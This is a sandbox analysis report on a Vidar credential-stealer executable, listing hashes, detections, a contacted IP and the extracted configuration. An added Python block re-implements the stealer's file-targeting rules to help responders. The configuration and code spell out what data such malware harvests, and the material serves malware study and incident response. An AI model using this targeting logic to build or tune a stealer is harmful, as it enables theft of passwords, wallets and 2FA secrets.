Windows Analysis Report cYKFZFK0Rg.exe

Overview

General Information

Sample Name: cYKFZFK0Rg.exe
Analysis ID: 491602
MD5: e9441b756f99ee3adf804214119c1fa1
SHA1: 8fe649e6bc868401ba2a3b9bf345fc76692f53d4
SHA256: f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd
Tags: ArkeiStealer, exe

Detection

Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Yara detected Vidar
Yara detected Vidar stealer
Tries to steal Crypto Currency Wallets
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Machine Learning detection for sample
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
Drops PE files to the application program directory (C:\ProgramData)
One or more processes crash
PE file contains sections with non-standard names
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Is looking for software installed on the system
Queries information about the installed CPU (vendor, model number etc)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Checks if the current process is being debugged

Classification

AV Detection:

Found malware configuration
Source: HTTP data Malware Configuration Extractor: Vidar {"Saved Password": "1", "Cookies": "1", "Wallet": "1", "Internet History": "1", "Telegram": "1", "Screenshot": "1", "Grabber": "1", "Max Size": "250", "Search Path": "%DESKTOP%\\", "Extensions": ["*.txt", "*.dat", "*wallet*.*", "*2fa*.*", "*backup*.*", "*code*.*", "*password*.*", "*auth*.*", "*google*.*", "*utc*.*", "*UTC*.*", "*crypt*.*", "*key*.*"], "Max Filesize": "50", "Recusrive Search": "true", "Ignore Strings": "movies:music:mp3"}
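The grabber part of the extracted configuration above decides which user files leave the host: everything under the Desktop, recursively, whose name matches one of the wildcard patterns, that is under the size limit, and whose path does not contain one of the ignore strings. The following Python is an added example, not part of the sandbox report and not the stealer's own code. It parses the configuration exactly as the extractor printed it (including the "Recusrive Search" key spelling) and applies the grabber rules to a constructed Desktop listing, so a responder can see which files a victim would have lost. The KB unit for "Max Filesize", case-sensitive glob matching (suggested by the config listing both "*utc*.*" and "*UTC*.*") and substring matching for "Ignore Strings" are assumptions; the report does not show the stealer's matching code.

```python
import fnmatch
import json
from dataclasses import dataclass

# Configuration as printed by the sandbox's Malware Configuration Extractor
# (copied from the report; the "Recusrive Search" spelling is the extractor's).
VIDAR_CONFIG_JSON = r'''{"Saved Password": "1", "Cookies": "1", "Wallet": "1", "Internet History": "1", "Telegram": "1", "Screenshot": "1", "Grabber": "1", "Max Size": "250", "Search Path": "%DESKTOP%\\", "Extensions": ["*.txt", "*.dat", "*wallet*.*", "*2fa*.*", "*backup*.*", "*code*.*", "*password*.*", "*auth*.*", "*google*.*", "*utc*.*", "*UTC*.*", "*crypt*.*", "*key*.*"], "Max Filesize": "50", "Recusrive Search": "true", "Ignore Strings": "movies:music:mp3"}'''


@dataclass
class GrabberRules:
    enabled: bool
    search_path: str
    patterns: list
    max_filesize_kb: int        # assumed unit: kilobytes (not stated in the report)
    recursive: bool
    ignore_substrings: list


def parse_vidar_config(raw: str) -> GrabberRules:
    """Turn the extractor's JSON into typed grabber rules."""
    cfg = json.loads(raw)
    # Accept both the misspelled key the extractor emits and the corrected one.
    recursive = cfg.get("Recusrive Search", cfg.get("Recursive Search", "false"))
    return GrabberRules(
        enabled=cfg.get("Grabber") == "1",
        search_path=cfg["Search Path"],
        patterns=list(cfg["Extensions"]),
        max_filesize_kb=int(cfg["Max Filesize"]),
        recursive=str(recursive).lower() == "true",
        ignore_substrings=[s for s in cfg["Ignore Strings"].split(":") if s],
    )


def would_grab(rules: GrabberRules, relpath: str, size_bytes: int) -> bool:
    """Return True if a file under the search root matches the grabber rules.

    relpath is relative to the search root and uses Windows backslashes.
    """
    if not rules.enabled:
        return False
    # A backslash in the relative path means the file sits in a subfolder,
    # which is only collected when recursive search is on.
    if "\\" in relpath and not rules.recursive:
        return False
    # Assumption: ignore strings are matched as case-insensitive substrings
    # of the whole path (so a "music" folder excludes everything below it).
    lowered = relpath.lower()
    if any(s in lowered for s in rules.ignore_substrings):
        return False
    if size_bytes > rules.max_filesize_kb * 1024:
        return False
    name = relpath.rsplit("\\", 1)[-1]
    # Assumption: case-sensitive wildcard matching, which is the only reading
    # under which listing both "*utc*.*" and "*UTC*.*" makes sense.
    return any(fnmatch.fnmatchcase(name, p) for p in rules.patterns)


def select_files(rules: GrabberRules, listing) -> list:
    """Filter a (relative path, size in bytes) listing down to what is exfiltrated."""
    return [path for path, size in listing if would_grab(rules, path, size)]


# Constructed Desktop listing for the demonstration; not taken from the report.
SAMPLE_DESKTOP = [
    ("notes.txt", 2_048),                       # *.txt, small -> grabbed
    ("wallet.dat", 120_000),                    # *.dat but over 50 KB -> skipped
    ("Exodus\\seed-backup.txt", 512),           # nested; grabbed via recursive search
    ("UTC--2021-09-01--abcdef.json", 900),      # Ethereum keystore naming -> *UTC*.*
    ("music\\mp3list.txt", 100),                # path hits an ignore string -> skipped
    ("holiday.jpg", 30_000),                    # no pattern matches -> skipped
    ("vacation-Backup.zip", 40_000),            # "Backup" != "backup" case-sensitively
]

if __name__ == "__main__":
    rules = parse_vidar_config(VIDAR_CONFIG_JSON)
    for path in select_files(rules, SAMPLE_DESKTOP):
        print("would be exfiltrated:", path)
```

Run against a real victim's Desktop inventory (path plus size), the same selection tells you which documents to treat as compromised; note that the 50 KB cap means large wallet files are skipped by the grabber but the dedicated "Wallet" module still targets known wallet locations separately.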
Multi AV Scanner detection for submitted file
Source: cYKFZFK0Rg.exe Virustotal: Detection: 25%
Machine Learning detection for sample
Source: cYKFZFK0Rg.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 1.0.cYKFZFK0Rg.exe.2a60174.2.unpack Avira: Label: TR/Kazy.4159236
Source: 1.0.cYKFZFK0Rg.exe.2a60174.35.unpack Avira: Label: TR/Kazy.4159236
Source: 1.0.cYKFZFK0Rg.exe.2a60174.20.unpack Avira: Label: TR/Kazy.4159236
Source: 1.0.cYKFZFK0Rg.exe.3010000.36.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 1.0.cYKFZFK0Rg.exe.3010000.18.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 1.0.cYKFZFK0Rg.exe.2a60174.32.unpack Avira: Label: TR/Kazy.4159236
Source: 1.0.cYKFZFK0Rg.exe.3010000.15.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 1.0.cYKFZFK0Rg.exe.2a60174.23.unpack Avira: Label: TR/Kazy.4159236
Source: 1.0.cYKFZFK0Rg.exe.2a60174.5.unpack Avira: Label: TR/Kazy.4159236
Source: 1.0.cYKFZFK0Rg.exe.3010000.12.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 1.0.cYKFZFK0Rg.exe.3010000.30.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 1.0.cYKFZFK0Rg.exe.2a60174.11.unpack Avira: Label: TR/Kazy.4159236
Source: 1.0.cYKFZFK0Rg.exe.2a60174.8.unpack Avira: Label: TR/Kazy.4159236
Source: 1.0.cYKFZFK0Rg.exe.3010000.27.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 1.0.cYKFZFK0Rg.exe.2a60174.29.unpack Avira: Label: TR/Kazy.4159236
Source: 1.0.cYKFZFK0Rg.exe.2a60174.17.unpack Avira: Label: TR/Kazy.4159236
Source: 1.0.cYKFZFK0Rg.exe.2a60174.14.unpack Avira: Label: TR/Kazy.4159236
Source: 1.0.cYKFZFK0Rg.exe.3010000.3.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 1.0.cYKFZFK0Rg.exe.3010000.21.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 1.0.cYKFZFK0Rg.exe.3010000.9.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 1.0.cYKFZFK0Rg.exe.3010000.24.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 1.0.cYKFZFK0Rg.exe.2a60174.26.unpack Avira: Label: TR/Kazy.4159236
Source: 1.0.cYKFZFK0Rg.exe.3010000.6.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 1.0.cYKFZFK0Rg.exe.3010000.33.unpack Avira: Label: TR/Patched.Ren.Gen

Compliance:

Uses 32bit PE files
Source: cYKFZFK0Rg.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
Uses secure TLS version for HTTPS connections
Source: unknown HTTPS traffic detected: 88.99.75.82:443 -> 192.168.2.7:49742 version: TLS 1.2
Binary contains paths to debug symbols
Source: Binary string: rsaenh.pdb source: WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: CLBCatQ.pdb+ source: WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: msvcrt.pdbk source: WerFault.exe, 00000005.00000003.273441706.0000000004B91000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304024163.0000000004B01000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333642964.0000000002DA1000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361392768.0000000004C01000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403910058.00000000055C5000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474404687.0000000005044000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515363571.0000000005464000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdbjX source: WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp
Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000005.00000003.273425957.00000000049C1000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.303970466.0000000004971000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.333599368.0000000004DA1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.361366430.0000000004C31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.403776159.00000000054D1000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.474552945.00000000049A1000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.515524165.0000000005301000.00000004.00000001.sdmp
Source: Binary string: crypt32.pdbN source: WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp
Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000005.00000003.273425957.00000000049C1000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.303970466.0000000004971000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.333599368.0000000004DA1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.361366430.0000000004C31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.403776159.00000000054D1000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.474552945.00000000049A1000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.515524165.0000000005301000.00000004.00000001.sdmp
Source: Binary string: dwmapi.pdb8 source: WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp
Source: Binary string: mskeyprotect.pdb source: WerFault.exe, 0000001B.00000003.403584503.00000000055D1000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.474348185.0000000005052000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.515274442.0000000005472000.00000004.00000001.sdmp
Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: mozglue[1].dll.1.dr
Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000005.00000003.273441706.0000000004B91000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304024163.0000000004B01000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333642964.0000000002DA1000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361392768.0000000004C01000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403910058.00000000055C5000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474404687.0000000005044000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515363571.0000000005464000.00000004.00000040.sdmp
Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000005.00000003.273441706.0000000004B91000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304151461.0000000004B05000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333724286.0000000002DA5000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361392768.0000000004C01000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403910058.00000000055C5000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474484279.0000000005047000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515425429.0000000005467000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb source: WerFault.exe, 00000005.00000003.268737897.00000000028E0000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.303970466.0000000004971000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.333599368.0000000004DA1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.361366430.0000000004C31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.390319982.000000000324D000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.474552945.00000000049A1000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.500274963.0000000002F6D000.00000004.00000001.sdmp
Source: Binary string: dwmapi.pdb' source: WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp
Source: Binary string: dpapi.pdbfQ source: WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp
Source: Binary string: winnsi.pdb source: WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: cryptsp.pdb source: WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: version.pdb`X source: WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp
Source: Binary string: advapi32.pdb source: WerFault.exe, 00000005.00000003.273425957.00000000049C1000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.303970466.0000000004971000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.333599368.0000000004DA1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.361366430.0000000004C31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.403776159.00000000054D1000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.474552945.00000000049A1000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.515524165.0000000005301000.00000004.00000001.sdmp
Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000005.00000003.273441706.0000000004B91000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304151461.0000000004B05000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333724286.0000000002DA5000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361392768.0000000004C01000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403910058.00000000055C5000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474484279.0000000005047000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515425429.0000000005467000.00000004.00000040.sdmp
Source: Binary string: dwmapi.pdb. source: WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp
Source: Binary string: dwmapi.pdb- source: WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp
Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: vcruntime140.i386.pdbGCTL source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, vcruntime140[1].dll.1.dr
Source: Binary string: ntmarta.pdb source: WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: urlmon.pdb source: WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: schannel.pdb source: WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: dhcpcsvc.pdbA source: WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: wintrust.pdbc source: WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000005.00000003.273425957.00000000049C1000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.303970466.0000000004971000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.333599368.0000000004DA1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.361366430.0000000004C31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.403776159.00000000054D1000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.462570750.00000000029F9000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.515524165.0000000005301000.00000004.00000001.sdmp
Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: ws2_32.pdbr source: WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp
Source: Binary string: OneCoreUAPCommonProxyStub.pdbW source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp
Source: Binary string: gdiplus.pdb( source: WerFault.exe, 00000020.00000003.461640685.00000000044C6000.00000004.00000001.sdmp
Source: Binary string: OneCoreUAPCommonProxyStub.pdbR source: WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp
Source: Binary string: msvcp140.i386.pdb source: msvcp140.dll.1.dr
Source: Binary string: bcrypt.pdb@ source: WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp
Source: Binary string: dwmapi.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: rasadhlp.pdbx source: WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp
Source: Binary string: advapi32.pdb! source: WerFault.exe, 0000001B.00000003.403776159.00000000054D1000.00000004.00000001.sdmp
Source: Binary string: urlmon.pdb source: WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, softokn3.dll.1.dr
Source: Binary string: propsys.pdbU source: WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: version.pdbF source: WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp
Source: Binary string: ws2_32.pdb source: WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: aCnjrFnCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 00000020.00000002.482493082.0000000002632000.00000004.00000001.sdmp
Source: Binary string: wimm32.pdbM source: WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: iphlpapi.pdbx source: WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp
Source: Binary string: wininet.pdb~ source: WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp
Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: ole32.pdbW source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp
Source: Binary string: psapi.pdb&XCG source: WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp
Source: Binary string: gdiplus.pdba source: WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: wininet.pdb\XEG source: WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp
Source: Binary string: comctl32.pdbd source: WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp
Source: Binary string: nsi.pdb source: WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403584503.00000000055D1000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.474348185.0000000005052000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.515274442.0000000005472000.00000004.00000001.sdmp
Source: Binary string: gdiplus.pdbPXqG source: WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp
Source: Binary string: shell32.pdbY source: WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: gpapi.pdb source: WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: powrprof.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: version.pdbR source: WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp
Source: Binary string: wimm32.pdbBXgG source: WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp
Source: Binary string: iertutil.pdbO source: WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: wsspicli.pdbk source: WerFault.exe, 00000005.00000003.273441706.0000000004B91000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304151461.0000000004B05000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333724286.0000000002DA5000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361392768.0000000004C01000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403910058.00000000055C5000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474484279.0000000005047000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515425429.0000000005467000.00000004.00000040.sdmp
Source: Binary string: ole32.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: wimm32.pdb4 source: WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp
Source: Binary string: dwmapi.pdbo source: WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: profapi.pdb} source: WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: iertutil.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: dnsapi.pdb"Q source: WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp
Source: Binary string: ole32.pdbL source: WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp
Source: Binary string: shell32.pdbJ source: WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp
Source: Binary string: winhttp.pdbt source: WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp
Source: Binary string: msasn1.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: iertutil.pdb? source: WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp
Source: Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.1.dr
